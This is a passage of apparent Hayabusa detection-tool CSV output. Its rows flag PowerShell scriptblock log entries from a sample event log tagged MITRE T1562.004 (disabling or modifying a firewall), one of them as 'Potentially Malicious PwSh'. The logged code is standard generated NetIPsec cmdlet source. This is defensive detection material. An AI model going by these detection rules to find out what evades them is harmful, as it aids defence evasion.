-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param(",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName ))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 